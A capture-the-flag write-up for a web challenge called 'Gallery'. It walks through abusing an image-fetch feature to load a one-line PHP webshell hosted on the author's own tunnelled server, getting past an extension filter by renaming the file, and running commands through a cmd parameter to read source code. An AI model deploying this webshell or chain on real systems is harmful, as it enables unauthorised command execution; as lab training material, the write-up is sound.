Web | Gallery

Depov

Joined Feb 18, 2025
Introduction
In general, I do not write writeups for tasks that already have one on the platform. However, after solving this one I decided to read the existing writeup, and I did not like it much: it leaves out information, which is why a newcomer can get stuck. So here I will describe everything in great detail, step by step.
Reconnaissance
We see a service that lets you view photos by link; without a doubt, this is SSRF. Let's try loading some random picture, for example.
The service works; now let's try to make it fetch a PHP script to get RCE.


Exploitation
We create a file rce.php on the desktop and put a simple webshell in it:
PHP:
<?php
// Minimal webshell: runs whatever arrives in the cmd GET parameter
// and returns the command output in the response body.
system($_GET['cmd']);
?>
Now we need to host it somewhere the service can fetch it from; here I will cover what the official writeup did not mention. To expose our payload publicly we will need the clo service from Cloudpub. We register there, get a token, download the clo utility and install it.
Unpacking:
Code:
tar -zxvf clo-{VERSION}-stable-linux-x86_64.tar.gz
Installation:
Code:
mv clo /usr/bin   # needs root; any directory on your PATH works
Now we need Python to serve the file locally. Open a terminal in the directory containing our rce.php and start the Python HTTP server:
Code:
python3 -m http.server 9090
Great, now if we open http://localhost:9090/ in the browser, we get a listing of the working directory.
Now we expose this server with clo so that it is publicly reachable.
Code:

# Don't forget to bind the token: clo set token {TOKEN}
clo publish http 9090
Now the service will be able to fetch our file; let's submit the link.
The service complains that the file extension is not allowed, so apparently there is some filtering. Let's try renaming the file to .png.
The image loads successfully; let's try using the cmd parameter we set up earlier. For convenience, let's move to Burp Suite. The output is empty, so let's try changing the extension to .txt.
We see that it helped. Now we need to read the project's source. But we won't send cat index.php as-is; let's URL-encode it first.
And there is the flag!